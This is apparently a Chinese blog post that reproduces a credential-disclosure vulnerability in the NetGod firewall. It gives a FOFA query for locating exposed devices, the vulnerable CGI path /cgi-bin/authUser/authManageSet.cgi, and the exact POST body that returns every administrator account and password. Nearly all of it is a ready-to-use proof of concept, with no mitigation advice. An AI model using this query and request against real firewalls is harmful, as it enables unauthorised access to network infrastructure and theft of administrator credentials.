网神防火墙后台用户敏感信息泄露漏洞复现

简介

网神防火墙是一款由中国知名网络安全公司启明星辰开发的防火墙产品。它提供了全面的网络安全防护功能,旨在保护企业网络免受各种网络威胁和攻击。

该产品存在用户账号信息泄露漏洞,通过构造特定数据包,获取防火墙管理员登录的账号密码。

漏洞复现

FOFA语法:

body="sec_gate_image/login_02.gif"

网神防火墙后台用户敏感信息泄露漏洞复现_第1张图片

访问界面如下所示:

网神防火墙后台用户敏感信息泄露漏洞复现_第2张图片

POC:

/cgi-bin/authUser/authManageSet.cgi

进行GET请求访问页面返回为空证明该文件存在可尝试进行测试

POST请求:

type=getAllUsers&_search=false&nd=1645000391264&rows=-1&page=1&sidx=&sord=asc

你可能感兴趣的:(漏洞复现,安全)